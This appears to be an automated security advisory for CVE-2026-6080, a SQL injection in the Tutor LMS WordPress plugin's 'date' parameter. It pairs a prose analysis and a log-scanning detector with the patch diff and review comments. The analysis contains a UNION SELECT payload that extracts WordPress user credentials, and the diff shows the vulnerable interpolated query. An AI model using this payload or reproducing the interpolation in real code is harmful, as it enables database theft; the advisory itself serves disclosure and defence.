Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: April 17, 2026

CVE-2026-6080: Tutor LMS <= 3.9.8 – Authenticated (Admin+) SQL Injection via 'date' Parameter (tutor)

CVE ID: CVE-2026-6080
Plugin: tutor
Severity: Medium (CVSS 6.5)
CWE: 89
Vulnerable Version: 3.9.8
Patched Version: 3.9.9
Disclosed: April 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6080:
The vulnerability is an authenticated SQL injection in the Tutor LMS WordPress plugin affecting versions up to and including 3.9.8. The flaw exists in the instructor and student listing functionality where the ‘date’ parameter is insufficiently sanitized before being interpolated into SQL queries. This allows attackers with administrator-level access to execute arbitrary SQL commands and extract sensitive information from the database.

The root cause is improper handling of the 'date' parameter in two SQL query fragments within the `Instructors_List` class. In the vulnerable code at `tutor/classes/Instructors_List.php` lines 376 and 449, the `$date` variable is interpolated directly into a double-quoted SQL string: `"AND DATE(user.user_registered) = CAST('$date' AS DATE )"`. This occurs in both the `get_instructors` and `get_total_instructors` methods. The value originates from user input and reaches these methods through their `$date` parameter, where it is used in SQL construction without escaping.

Exploitation requires authenticated access with administrator privileges. Attackers would target the AJAX endpoints or REST API handlers that call the vulnerable `get_instructors` or `get_total_instructors` methods. The attack vector involves submitting malicious SQL payloads through the 'date' parameter. For example, an attacker could send a request with `date=2024-01-01' UNION SELECT user_login,user_pass FROM wp_users-- -` to extract WordPress user credentials. The injection occurs because the single quote in the payload ends the string literal passed to the CAST function, so the rest of the value is parsed as SQL instead of data.

The patch in version 3.9.9 replaces the direct string interpolation with a prepared statement built by `$wpdb->prepare()`. Both vulnerable lines are changed to use `$wpdb->prepare( 'AND DATE(user.user_registered) = %s', $date )`. This ensures the date parameter is escaped and treated as a string literal rather than executable SQL code. The patch also includes unrelated improvements such as terms and conditions acceptance checks and corrections of the misspelled `area-hidden` attribute to `aria-hidden`.

Successful exploitation allows complete database compromise. Attackers can extract sensitive information including WordPress user credentials, payment details, course enrollment records, and personally identifiable information. The vulnerability enables data exfiltration, privilege escalation by modifying user roles, and potentially complete site takeover through administrative credential theft.
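
A detection sketch for the 'date' parameter described above, as an added example that is not part of the original analysis or of the plugin: it scans web access-log lines and flags admin-area requests whose `date` query value is not a strict `YYYY-MM-DD` calendar date. The `/wp-admin/` path prefix, the `page=example-list` query string and the log lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Request portion of a common/combined-format access log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Shape check first: exactly ten ASCII characters, digits and hyphens only.
STRICT_DATE_RE = re.compile(r"[0-9]{4}-[0-9]{2}-[0-9]{2}")


def is_strict_date(value):
    """Return True only for a real calendar date written exactly as YYYY-MM-DD."""
    if not STRICT_DATE_RE.fullmatch(value):
        return False
    try:
        datetime.strptime(value, "%Y-%m-%d")
    except ValueError:
        # Right shape but not a real date, e.g. 2026-02-30.
        return False
    return True


def suspicious_date_requests(lines, path_prefix="/wp-admin/"):
    """Return (line_number, client, decoded_value) for each request under
    path_prefix whose `date` query parameter is present, non-empty and not a
    strict date. path_prefix is an assumption; adjust it to the site layout."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        if not parts.path.startswith(path_prefix):
            continue
        # parse_qs percent-decodes values, so encoded quotes are seen as quotes.
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("date", []):
            # An empty value means "no date filter" and is not interesting.
            if value and not is_strict_date(value):
                findings.append((lineno, line.split()[0], value))
    return findings


# Constructed sample log lines (documentation IP range, made-up page name).
SAMPLE_LOG = [
    '203.0.113.10 - - [17/Apr/2026:10:00:01 +0000] "GET /wp-admin/admin.php?page=example-list&date=2026-04-01 HTTP/1.1" 200 5120',
    '203.0.113.10 - - [17/Apr/2026:10:00:05 +0000] "GET /wp-admin/admin.php?page=example-list&date=2026-04-01%27+--+x HTTP/1.1" 200 5120',
    '203.0.113.10 - - [17/Apr/2026:10:00:09 +0000] "GET /wp-admin/admin.php?page=example-list&date=2026-02-30 HTTP/1.1" 200 5120',
    '203.0.113.10 - - [17/Apr/2026:10:00:12 +0000] "GET /wp-admin/admin.php?page=example-list&date= HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Apr/2026:10:01:00 +0000] "GET /shop/?date=tomorrow HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for lineno, client, value in suspicious_date_requests(SAMPLE_LOG):
        print(f"line {lineno}: {client} sent non-date value {value!r}")
```

Access logs normally record only the query string, so values sent in a POST body need the same check applied at a WAF or in application-level logging.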

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/tutor/classes/Admin.php
+++ b/tutor/classes/Admin.php
@@ -37,6 +37,7 @@
 	public function __construct() {

 		add_action( 'admin_notices', array( $this, 'show_unstable_version_admin_notice' ) );
+		add_action( 'admin_notices', array( $this, 'show_v4_beta_notice' ) );

 		add_action( 'admin_menu', array( $this, 'register_menu' ) );
 		// Force activate menu for necessary.
@@ -84,6 +85,61 @@
 			<?php
 		}
 	}
+
+	/**
+	 * Show version 4 admin notice.
+	 *
+	 * @since 3.9.9
+	 *
+	 * @return void
+	 */
+	public function show_v4_beta_notice() {
+		if ( version_compare( TUTOR_VERSION, '4', '<' ) ) {
+			?>
+			<div class="tutor-v4-beta-notice notice is-dismissible">
+				<div class="tutor-v4-beta-notice-left">
+					<img src="<?php echo esc_url( tutor()->url . 'assets/images/v4-notice-logo.svg' ); ?>" alt="Tutor LMS 4.0 Beta">
+				</div>
+			<div class="tutor-v4-beta-notice-right">
+				<div class="tutor-v4-beta-notice-right-content">
+					<h3><?php esc_html_e( 'Be the First to Try Tutor LMS 4.0 Beta!', 'tutor' ); ?></h3>
+					<p>
+						<?php
+						echo wp_kses(
+							sprintf(
+								/* translators: 1: opening anchor tag, 2: closing anchor tag */
+								__(
+									'Explore the upcoming features of Tutor LMS 4.0, test the experience, and help us improve with your valuable %1$sfeedback%2$s.',
+									'tutor'
+								),
+								'<a href="https://forms.gle/Dxc1CWT63UcEAJGR9" target="_blank" rel="noopener noreferrer">',
+								' <i class="tutor-icon-external-link" aria-hidden="true"></i></a>'
+							),
+							array(
+								'a' => array(
+									'href'   => true,
+									'target' => true,
+									'rel'    => true,
+								),
+								'i' => array(
+									'class'       => true,
+									'aria-hidden' => true,
+								),
+							)
+						);
+						?>
+					</p>
+				</div>
+				<div class="tutor-v4-beta-notice-right-buttons">
+					<a href="https://tutorlms.com/blog/first-look-into-tutor-lms-4-0/?nocache=1" target="_blank" rel="noopener noreferrer" class="tutor-btn tutor-btn-tertiary tutor-gap-4px tutor-text-nowrap">
+						<?php esc_html_e( 'Try now', 'tutor' ); ?>
+					</a>
+				</div>
+			</div>
+		</div>
+			<?php
+		}
+	}

 	/**
 	 * Register admin menus
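Review bot: show_v4_beta_notice() has no capability check and no stored dismissal, so every user who reaches `admin_notices` sees the banner again on each admin page load while TUTOR_VERSION is below 4; the `is-dismissible` class only hides it in the browser. Gate the output with a current_user_can() check and persist the dismissal in user meta or an option. The opening `<div class="tutor-v4-beta-notice-right">` is also indented one level shallower than its sibling, which makes the nesting hard to follow.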
--- a/tutor/classes/Course.php
+++ b/tutor/classes/Course.php
@@ -1695,6 +1695,8 @@
 	 * Update course content order
 	 *
 	 * @since 1.0.0
+	 * @since 3.9.9 Check if user can manage course before updating order.
+	 *
 	 * @return void
 	 */
 	public function ajax_update_course_content_order() {
@@ -1707,11 +1709,15 @@
 			wp_send_json_error( __( 'Sorting order is required', 'tutor' ) );
 		}

-		foreach ( $sorting_order as $topic ) {
-			if ( isset( $topic['topic_id'] ) && ! tutor_utils()->can_user_manage( 'topic', $topic['topic_id'] ) ) {
-				wp_send_json_error( __( 'Access Denied!', 'tutor' ) );
-				return;
-			}
+		$topic_id  = (int) isset( $sorting_order[0], $sorting_order[0]['topic_id'] ) ? $sorting_order[0]['topic_id'] : 0;
+		$course_id = wp_get_post_parent_id( $topic_id );
+
+		if ( ! $topic_id || ! $course_id ) {
+			wp_send_json_error( tutor_utils()->error_message( 'invalid_req' ) );
+		}
+
+		if ( ! tutor_utils()->can_user_manage( 'course', $course_id ) || ! User::is_admin() ) {
+			wp_send_json_error( tutor_utils()->error_message() );
 		}

 		if ( Input::has( 'content_parent' ) ) {
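Review bot: The new authorization check only looks at `$sorting_order[0]`, where the removed loop checked every `topic_id` in the request, so later entries are never verified to belong to the course that was authorized. Two further problems on the same lines: in `(int) isset( ... ) ? ... : 0` the cast binds to `isset()`, not to the ternary, so `$topic_id` keeps whatever type the request supplied; and `! can_user_manage( 'course', $course_id ) || ! User::is_admin()` rejects anyone who is not an admin even when they can manage the course, which looks like it should be `&&`. Suggest parenthesizing the ternary before casting, checking that every topic's parent is `$course_id`, and confirming the intended operator.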
@@ -1719,11 +1725,6 @@
 			$topic_id       = tutor_utils()->array_get( 'parent_topic_id', $content_parent );
 			$content_id     = tutor_utils()->array_get( 'content_id', $content_parent );

-			if ( ! tutor_utils()->can_user_manage( 'topic', $topic_id ) ) {
-				wp_send_json_success( array( 'message' => __( 'Access Denied!', 'tutor' ) ) );
-				exit;
-			}
-
 			// Update the parent topic id of the content.
 			global $wpdb;
 			$wpdb->update( $wpdb->posts, array( 'post_parent' => $topic_id ), array( 'ID' => $content_id ) );
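Review bot: With the `can_user_manage( 'topic', $topic_id )` check removed, `parent_topic_id` and `content_id` from `content_parent` go straight into `$wpdb->update()` on `$wpdb->posts` with no check that either belongs to the course authorized earlier in the function. `$topic_id` is reassigned here from request data, so the earlier check on `$sorting_order[0]` does not cover it. Verify that `wp_get_post_parent_id( $topic_id )` equals `$course_id` and that `$content_id` is content of that course before changing `post_parent`.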
--- a/tutor/classes/Instructor.php
+++ b/tutor/classes/Instructor.php
@@ -95,9 +95,15 @@
 				'user_login'            => __( 'User Name field is required', 'tutor' ),
 				'password'              => __( 'Password field is required', 'tutor' ),
 				'password_confirmation' => __( 'Password Confirmation field is required', 'tutor' ),
+
 			)
 		);

+		$terms_conditions_link = tutor_utils()->get_toc_page_link();
+		if ( $terms_conditions_link ) {
+			$required_fields['terms_conditions'] = __( 'Please accept the Terms and Conditions to continue', 'tutor' );
+		}
+
 		$validation_errors = array();

 		/*
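Review bot: The `terms_conditions` block added after the `$required_fields` filter is repeated verbatim in Student.php, so the two registration paths can drift apart; move it into one shared helper that both classes call. The blank line added inside the array after `password_confirmation` is stray whitespace and can be dropped.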
--- a/tutor/classes/Instructors_List.php
+++ b/tutor/classes/Instructors_List.php
@@ -373,8 +373,8 @@
 			}
 		}

-		$date_clause   = '' !== $date ? "AND DATE(user.user_registered) = CAST('$date' AS DATE )" : '';
-		$in_clause     = QueryHelper::prepare_in_clause( $status );
+		$date_clause = '' !== $date ? $wpdb->prepare( 'AND DATE(user.user_registered) = %s', $date ) : '';
+		$in_clause   = QueryHelper::prepare_in_clause( $status );

 		$query  = "SELECT
 					DISTINCT user.*,
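Review bot: `$wpdb->prepare()` with `%s` closes the injection on the `$date_clause` line, but the `CAST( ... AS DATE )` wrapper is dropped without comment and `$date` is still not checked to be a date. Validate the format before building the clause (for example, accept only `Y-m-d` and otherwise leave `$date_clause` empty), and state the expected format in the method's docblock.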
@@ -446,10 +446,11 @@
 		$course_clause = '';
 		if ( '' !== $course_id ) {
 			$course_id     = (int) $course_id;
-			$course_clause =  "AND umeta.meta_value = {$course_id}";
+			$course_clause = "AND umeta.meta_value = {$course_id}";
 		}
-		$date_clause   = '' !== $date ? "AND DATE(user.user_registered) = CAST('$date' AS DATE )" : '';
-		$in_clause     = QueryHelper::prepare_in_clause( $status );
+
+		$date_clause = '' !== $date ? $wpdb->prepare( 'AND DATE(user.user_registered) = %s', $date ) : '';
+		$in_clause   = QueryHelper::prepare_in_clause( $status );

 		$query  = "SELECT
 					COUNT(DISTINCT user.ID)
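Review bot: The `$date_clause` line here duplicates the one in the previous hunk, the same duplication that put the injectable string in two methods. Build the clause in one private helper so a later change cannot fix one copy and miss the other. The `(int)` cast on `$course_id` is sufficient for `$course_clause`, though `$wpdb->prepare()` with `%d` would match the style now used for the date.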
--- a/tutor/classes/Student.php
+++ b/tutor/classes/Student.php
@@ -71,6 +71,11 @@
 			)
 		);

+		$terms_conditions_link = tutor_utils()->get_toc_page_link();
+		if ( $terms_conditions_link ) {
+			$required_fields['terms_conditions'] = __( 'Please accept the Terms and Conditions to continue', 'tutor' );
+		}
+
 		$validation_errors = array();

 		// Registration error push into validation_errors.
@@ -86,6 +91,7 @@
 			}
 		}

+
 		if ( ! filter_var( tutor_utils()->input_old( 'email' ), FILTER_VALIDATE_EMAIL ) ) {
 			$validation_errors['email'] = __( 'Valid E-Mail is required', 'tutor' );
 		}
--- a/tutor/ecommerce/CheckoutController.php
+++ b/tutor/ecommerce/CheckoutController.php
@@ -19,6 +19,7 @@
 use TutorModelsBillingModel;
 use TutorTraitsJsonResponse;
 use TutorHelpersValidationHelper;
+use TutorProEcommerceGuestCheckoutGuestCheckout;

 if ( ! defined( 'ABSPATH' ) ) {
 	exit;
@@ -560,12 +561,26 @@
 			set_transient( self::PAY_NOW_ALERT_MSG_TRANSIENT_KEY . 'pay_now_nonce_alert', $errors );
 			return;
 		}
+
 		global $wpdb;
 		$order_data      = null;
 		$billing_model   = new BillingModel();
-		$current_user_id = is_user_logged_in() ? get_current_user_id() : wp_rand();
+		$current_user_id = get_current_user_id();
+
+		$is_guest_checkout_endabled = class_exists( 'TutorProEcommerceGuestCheckoutGuestCheckout' ) && GuestCheckout::is_enable();
+
+		// Pevent invalid request.
+		if ( ! $current_user_id ) {
+			if ( $is_guest_checkout_endabled ) {
+				// Guest user.
+				$current_user_id = wp_rand(); // A random id to iniquely indentify.
+			} else {
+				wp_die( esc_html( tutor_utils()->error_message( 'invalid_req' ) ) );
+			}
+		}
+
 		$request = Input::sanitize_array( $_POST ); //phpcs:ignore --sanitized.
-		$order_id        = Input::get( 'order_id', 0, Input::TYPE_INT );
+		$order_id = Input::get( 'order_id', 0, Input::TYPE_INT );

 		if ( $order_id ) {
 			$order_data = OrderModel::get_valid_incomplete_order( $order_id, get_current_user_id(), true );
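Review bot: Using `wp_rand()` as `$current_user_id` for guests yields an integer that can coincide with a real user ID, and that value is later used as a user identifier (`$billing_model->get_info( $current_user_id )` and the `PAY_NOW_ERROR_TRANSIENT_KEY` transient further down). Use a guest identifier that cannot collide with the users table, such as a prefixed session token. The unchanged `get_valid_incomplete_order( $order_id, get_current_user_id(), true )` call still passes `get_current_user_id()` rather than `$current_user_id`, and the new names and comments carry typos (`$is_guest_checkout_endabled`, "Pevent", "iniquely indentify").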
@@ -621,6 +636,30 @@

 		if ( empty( $object_ids ) ) {
 			array_push( $errors, __( 'Invalid cart items', 'tutor' ) );
+		} elseif ( OrderModel::TYPE_SINGLE_ORDER === $order_type ) {
+			foreach ( $object_ids as $object_id ) {
+				if ( ! in_array( get_post_type( $object_id ), array( tutor()->course_post_type, tutor()->bundle_post_type ), true ) ) {
+					// translators: %s is the course title.
+					array_push( $errors, sprintf( __( 'Invalid item: %s', 'tutor' ), get_the_title( $object_id ) ) );
+				}
+			}
+		} elseif ( OrderModel::TYPE_SUBSCRIPTION === $order_type ) {
+			$item_id = $object_ids[0] ?? 0;
+			if ( $item_id ) {
+				$plan = apply_filters( 'tutor_get_plan_info', null, $item_id );
+				if ( ! $plan ) {
+					array_push( $errors, __( 'Invalid plan', 'tutor' ) );
+				}
+			} else {
+				array_push( $errors, __( 'Invalid plan', 'tutor' ) );
+			}
+		} else {
+			array_push( $errors, __( 'Invalid order type', 'tutor' ) );
+		}
+
+		if ( ! empty( $errors ) ) {
+			set_transient( self::PAY_NOW_ERROR_TRANSIENT_KEY . $current_user_id, $errors );
+			return;
 		}

 		$billing_info = $billing_model->get_info( $current_user_id );
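Review bot: In the `TYPE_SINGLE_ORDER` branch the error message calls `get_the_title( $object_id )` for IDs that have just failed the post-type check, so the title of any post whose ID is submitted is written into the error list stored under `PAY_NOW_ERROR_TRANSIENT_KEY`, which may expose titles the buyer should not see. Report the ID or a generic "Invalid item" instead. The subscription branch validates only `$object_ids[0]`; if more than one ID can be submitted, reject the extras explicitly.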
--- a/tutor/ecommerce/HooksHandler.php
+++ b/tutor/ecommerce/HooksHandler.php
@@ -195,7 +195,7 @@
 		 *
 		 * @since 3.9.7
 		 */
-		$is_valid_paid_order = OrderModel::ORDER_COMPLETED === $order_details && OrderModel::PAYMENT_PAID === $order_details->payment_status;
+		$is_valid_paid_order = OrderModel::ORDER_COMPLETED === $order_details->order_status && OrderModel::PAYMENT_PAID === $order_details->payment_status;

 		if ( $order_details && ! $is_valid_paid_order ) {
 			$prev_payment_status = $order_details->payment_status;
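Review bot: The corrected line dereferences `$order_details->order_status` before the `if ( $order_details && ... )` guard in the following statement, so a falsy `$order_details` now triggers a property access on a non-object; the old comparison against `$order_details` itself short-circuited before reaching `->payment_status`. Put the null check first, for example by starting the expression with `$order_details &&`.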
@@ -219,6 +219,9 @@
 				case $this->order_model::PAYMENT_REFUNDED:
 					$order_data['order_status'] = $this->order_model::ORDER_CANCELLED;
 					break;
+				case $this->order_model::PAYMENT_PENDING:
+					$order_data['order_status'] = $this->order_model::ORDER_PENDING;
+					break;
 			}

 			$update = $this->order_model->update_order( $order_id, $order_data );
--- a/tutor/includes/tutor-general-functions.php
+++ b/tutor/includes/tutor-general-functions.php
@@ -1113,7 +1113,7 @@
 			<span>
 				<?php echo is_array( $allowed_tags ) && count( $allowed_tags ) ? wp_kses( $message, $allowed_tags ) : esc_html( $message ); ?>
 			</span>
-			<span class="tutor-icon-times" area-hidden="true" onclick="this.closest('div').remove()" style="cursor: pointer;"></span>
+			<span class="tutor-icon-times" aria-hidden="true" onclick="this.closest('div').remove()" style="cursor: pointer;"></span>
 		</div>
 		<?php
 	}
@@ -1174,7 +1174,7 @@
 							<?php echo esc_html( isset( $button['title'] ) ? $button['title'] : '' ); ?>
 						</a>
 					<?php endforeach; ?>
-					<span class="tutor-icon-times" area-hidden="true" onclick="this.closest('#tutor-reuseable-snackbar').remove()" style="cursor: pointer;"></span>
+					<span class="tutor-icon-times" aria-hidden="true" onclick="this.closest('#tutor-reuseable-snackbar').remove()" style="cursor: pointer;"></span>
 				</div>
 			</div>
 		</div>
--- a/tutor/models/OrderModel.php
+++ b/tutor/models/OrderModel.php
@@ -38,6 +38,7 @@
 	const ORDER_COMPLETED  = 'completed';
 	const ORDER_CANCELLED  = 'cancelled';
 	const ORDER_TRASH      = 'trash';
+	const ORDER_PENDING    = 'pending';

 	/**
 	 * Payment status
@@ -51,6 +52,7 @@
 	const PAYMENT_UNPAID             = 'unpaid';
 	const PAYMENT_REFUNDED           = 'refunded';
 	const PAYMENT_PARTIALLY_REFUNDED = 'partially-refunded';
+	const PAYMENT_PENDING            = 'pending';

 	/**
 	 * Payment methods
@@ -291,6 +293,7 @@
 			self::ORDER_COMPLETED  => __( 'Completed', 'tutor' ),
 			self::ORDER_CANCELLED  => __( 'Cancelled', 'tutor' ),
 			self::ORDER_TRASH      => __( 'Trash', 'tutor' ),
+			self::ORDER_PENDING    => __( 'Pending', 'tutor' ),
 		);
 	}

@@ -323,6 +326,7 @@
 			self::PAYMENT_FAILED             => __( 'Failed', 'tutor' ),
 			self::PAYMENT_REFUNDED           => __( 'Refunded', 'tutor' ),
 			self::PAYMENT_PARTIALLY_REFUNDED => __( 'Partially Refunded', 'tutor' ),
+			self::PAYMENT_PENDING            => __( 'Pending', 'tutor' ),
 		);
 	}

--- a/tutor/restapi/RestAuth.php
+++ b/tutor/restapi/RestAuth.php
@@ -375,15 +375,15 @@
 			<td>
 				<div class="tutor-dropdown-parent">
 					<button type="button" class="tutor-iconic-btn" action-tutor-dropdown="toggle">
-						<span class="tutor-icon-kebab-menu" area-hidden="true"></span>
+						<span class="tutor-icon-kebab-menu" aria-hidden="true"></span>
 					</button>
 					<div class="tutor-dropdown tutor-dropdown-dark tutor-text-left">
 						<a href="javascript:void(0)" class="tutor-dropdown-item" data-tutor-modal-target="tutor-update-permission-modal" data-update-id="<?php echo esc_attr( $meta_id ); ?>" data-permission="<?php echo esc_attr( $permission ); ?>" data-description="<?php echo esc_attr( $description ); ?>">
-							<i class="tutor-icon-edit tutor-mr-8" area-hidden="true" data-update-id="<?php echo esc_attr( $meta_id ); ?>" data-permission="<?php echo esc_attr( $permission ); ?>" data-description="<?php echo esc_attr( $description ); ?>"></i>
+							<i class="tutor-icon-edit tutor-mr-8" aria-hidden="true" data-update-id="<?php echo esc_attr( $meta_id ); ?>" data-permission="<?php echo esc_attr( $permission ); ?>" data-description="<?php echo esc_attr( $description ); ?>"></i>
 							<span data-update-id="<?php echo esc_attr( $meta_id ); ?>" data-permission="<?php echo esc_attr( $permission ); ?>" data-description="<?php echo esc_attr( $description ); ?>"><?php esc_html_e( 'Edit', 'tutor' ); ?></span>
 						</a>
 						<a href="javascript:void(0)" class="tutor-dropdown-item" data-meta-id="<?php echo esc_attr( $meta_id ); ?>">
-							<i class="tutor-icon-trash-can-bold tutor-mr-8" area-hidden="true" data-meta-id="<?php echo esc_attr( $meta_id ); ?>"></i>
+							<i class="tutor-icon-trash-can-bold tutor-mr-8" aria-hidden="true" data-meta-id="<?php echo esc_attr( $meta_id ); ?>"></i>
 							<span data-meta-id="<?php echo esc_attr( $meta_id ); ?>"><?php esc_html_e( 'Revoke', 'tutor' ); ?></span>
 						</a>
 					</div>
--- a/tutor/templates/course-embed.php
+++ b/tutor/templates/course-embed.php
@@ -60,14 +60,14 @@
 			<div class="tutor-meta tutor-mt-12 tutor-mb-20">
 				<?php if ( tutor_utils()->get_option( 'enable_course_total_enrolled' ) ) : ?>
 					<div>
-						<span class="tutor-meta-icon tutor-icon-user-line" area-hidden="true"></span>
+						<span class="tutor-meta-icon tutor-icon-user-line" aria-hidden="true"></span>
 						<span class="tutor-meta-value"><?php echo esc_html( $course_students ); ?></span>
 					</div>
 				<?php endif; ?>

 				<?php if ( ! empty( $course_duration ) ) : ?>
 					<div>
-						<span class="tutor-icon-clock-line tutor-meta-icon" area-hidden="true"></span>
+						<span class="tutor-icon-clock-line tutor-meta-icon" aria-hidden="true"></span>
 						<span class="tutor-meta-value">
 							<?php
 								//phpcs:ignore --data sanitize through helper method
--- a/tutor/templates/course-filter/filters.php
+++ b/tutor/templates/course-filter/filters.php
@@ -26,7 +26,7 @@

 <form class="tutor-course-filter-form tutor-form">
 	<div class="tutor-mb-16 tutor-d-block tutor-d-xl-none tutor-text-right">
-		<a href="#" class="tutor-iconic-btn tutor-mr-n8" tutor-hide-course-filter><span class="tutor-icon-times" area-hidden="true"></span></a>
+		<a href="#" class="tutor-iconic-btn tutor-mr-n8" tutor-hide-course-filter><span class="tutor-icon-times" aria-hidden="true"></span></a>
 	</div>

 	<?php do_action( 'tutor_course_filter/before' ); ?>
@@ -34,7 +34,7 @@
 	<?php if ( in_array( 'search', $supported_filters ) ) : ?>
 		<div class="tutor-widget tutor-widget-search">
 			<div class="tutor-form-wrap">
-				<span class="tutor-icon-search tutor-form-icon" area-hidden="true"></span>
+				<span class="tutor-icon-search tutor-form-icon" aria-hidden="true"></span>
 				<input type="Search" class="tutor-form-control" name="keyword" placeholder="<?php esc_attr_e( 'Search', 'tutor' ); ?>"/>
 			</div>
 		</div>
--- a/tutor/templates/dashboard/announcements.php
+++ b/tutor/templates/dashboard/announcements.php
@@ -64,7 +64,7 @@
 	<div class="tutor-row tutor-align-lg-center">
 		<div class="tutor-col-lg-auto tutor-mb-16 tutor-mb-lg-0">
 			<div class="tutor-round-box tutor-p-8">
-				<i class="tutor-icon-bullhorn tutor-fs-3" area-hidden="true"></i>
+				<i class="tutor-icon-bullhorn tutor-fs-3" aria-hidden="true"></i>
 			</div>
 		</div>

--- a/tutor/templates/dashboard/assignments/review.php
+++ b/tutor/templates/dashboard/assignments/review.php
@@ -44,7 +44,7 @@

 	<div class="submitted-assignment-title tutor-mb-16">
 		<a class="tutor-btn tutor-btn-ghost" href="<?php echo esc_url( $submitted_url . '?assignment=' . $assignment_id ); ?>">
-			<span class="tutor-icon-previous tutor-mr-8" area-hidden="true"></span>
+			<span class="tutor-icon-previous tutor-mr-8" aria-hidden="true"></span>
 			<?php esc_html_e( 'Back', 'tutor' ); ?>
 		</a>
 	</div>
--- a/tutor/templates/dashboard/assignments/submitted.php
+++ b/tutor/templates/dashboard/assignments/submitted.php
@@ -40,7 +40,7 @@
 <div class="tutor-dashboard-content-inner tutor-dashboard-assignment-submits">
 	<div class="tutor-mb-24">
 		<a class="tutor-btn tutor-btn-ghost" href="<?php echo esc_url( tutor_utils()->get_tutor_dashboard_page_permalink( 'assignments' ) ); ?>">
-			<span class="tutor-icon-previous tutor-mr-8" area-hidden="true"></span>
+			<span class="tutor-icon-previous tutor-mr-8" aria-hidden="true"></span>
 			<?php esc_html_e( 'Back', 'tutor' ); ?>
 		</a>
 	</div>
--- a/tutor/templates/dashboard/dashboard.php
+++ b/tutor/templates/dashboard/dashboard.php
@@ -41,7 +41,7 @@
 								<div class="tutor-row tutor-gx-1">
 									<?php for ( $i = 1; $i <= $total_count; $i++ ) : ?>
 										<div class="tutor-col">
-											<div class="tutor-progress-bar" style="--tutor-progress-value: <?php echo $i > $complete_count ? 0 : 100; ?>%; height: 8px;"><div class="tutor-progress-value" area-hidden="true"></div></div>
+											<div class="tutor-progress-bar" style="--tutor-progress-value: <?php echo $i > $complete_count ? 0 : 100; ?>%; height: 8px;"><div class="tutor-progress-value" aria-hidden="true"></div></div>
 										</div>
 									<?php endfor; ?>
 								</div>
@@ -49,7 +49,7 @@

 							<div class="tutor-col-auto">
 								<span class="tutor-round-box tutor-my-n20">
-									<i class="tutor-icon-trophy" area-hidden="true"></i>
+									<i class="tutor-icon-trophy" aria-hidden="true"></i>
 								</span>
 							</div>
 						</div>
@@ -160,7 +160,7 @@
 			<div class="tutor-card">
 				<div class="tutor-d-flex tutor-flex-lg-column tutor-align-center tutor-text-lg-center tutor-px-12 tutor-px-lg-24 tutor-py-8 tutor-py-lg-32">
 					<span class="tutor-round-box tutor-mr-12 tutor-mr-lg-0 tutor-mb-lg-12">
-						<i class="tutor-icon-book-open" area-hidden="true"></i>
+						<i class="tutor-icon-book-open" aria-hidden="true"></i>
 					</span>
 					<div class="tutor-fs-3 tutor-fw-bold tutor-d-none tutor-d-lg-block"><?php echo esc_html( $enrolled_course_count ); ?></div>
 					<div class="tutor-fs-7 tutor-color-secondary"><?php esc_html_e( 'Enrolled Courses', 'tutor' ); ?></div>
@@ -173,7 +173,7 @@
 			<div class="tutor-card">
 				<div class="tutor-d-flex tutor-flex-lg-column tutor-align-center tutor-text-lg-center tutor-px-12 tutor-px-lg-24 tutor-py-8 tutor-py-lg-32">
 					<span class="tutor-round-box tutor-mr-12 tutor-mr-lg-0 tutor-mb-lg-12">
-						<i class="tutor-icon-mortarboard-o" area-hidden="true"></i>
+						<i class="tutor-icon-mortarboard-o" aria-hidden="true"></i>
 					</span>
 					<div class="tutor-fs-3 tutor-fw-bold tutor-d-none tutor-d-lg-block"><?php echo esc_html( $active_course_count ); ?></div>
 					<div class="tutor-fs-7 tutor-color-secondary"><?php esc_html_e( 'Active Courses', 'tutor' ); ?></div>
@@ -186,7 +186,7 @@
 			<div class="tutor-card">
 				<div class="tutor-d-flex tutor-flex-lg-column tutor-align-center tutor-text-lg-center tutor-px-12 tutor-px-lg-24 tutor-py-8 tutor-py-lg-32">
 					<span class="tutor-round-box tutor-mr-12 tutor-mr-lg-0 tutor-mb-lg-12">
-						<i class="tutor-icon-trophy" area-hidden="true"></i>
+						<i class="tutor-icon-trophy" aria-hidden="true"></i>
 					</span>
 					<div class="tutor-fs-3 tutor-fw-bold tutor-d-none tutor-d-lg-block"><?php echo esc_html( $completed_course_count ); ?></div>
 					<div class="tutor-fs-7 tutor-color-secondary"><?php esc_html_e( 'Completed Courses', 'tutor' ); ?></div>
@@ -202,7 +202,7 @@
 				<div class="tutor-card">
 					<div class="tutor-d-flex tutor-flex-lg-column tutor-align-center tutor-text-lg-center tutor-px-12 tutor-px-lg-24 tutor-py-8 tutor-py-lg-32">
 						<span class="tutor-round-box tutor-mr-12 tutor-mr-lg-0 tutor-mb-lg-12">
-							<i class="tutor-icon-user-graduate" area-hidden="true"></i>
+							<i class="tutor-icon-user-graduate" aria-hidden="true"></i>
 						</span>
 						<div class="tutor-fs-3 tutor-fw-bold tutor-d-none tutor-d-lg-block"><?php echo esc_html( $total_students ); ?></div>
 						<div class="tutor-fs-7 tutor-color-secondary"><?php esc_html_e( 'Total Students', 'tutor' ); ?></div>
@@ -215,7 +215,7 @@
 				<div class="tutor-card">
 					<div class="tutor-d-flex tutor-flex-lg-column tutor-align-center tutor-text-lg-center tutor-px-12 tutor-px-lg-24 tutor-py-8 tutor-py-lg-32">
 						<span class="tutor-round-box tutor-mr-12 tutor-mr-lg-0 tutor-mb-lg-12">
-							<i class="tutor-icon-box-open" area-hidden="true"></i>
+							<i class="tutor-icon-box-open" aria-hidden="true"></i>
 						</span>
 						<div class="tutor-fs-3 tutor-fw-bold tutor-d-none tutor-d-lg-block"><?php echo esc_html( count( $my_courses ) ); ?></div>
 						<div class="tutor-fs-7 tutor-color-secondary"><?php esc_html_e( 'Total Courses', 'tutor' ); ?></div>
@@ -228,7 +228,7 @@
 				<div class="tutor-card">
 					<div class="tutor-d-flex tutor-flex-lg-column tutor-align-center tutor-text-lg-center tutor-px-12 tutor-px-lg-24 tutor-py-8 tutor-py-lg-32">
 						<span class="tutor-round-box tutor-mr-12 tutor-mr-lg-0 tutor-mb-lg-12">
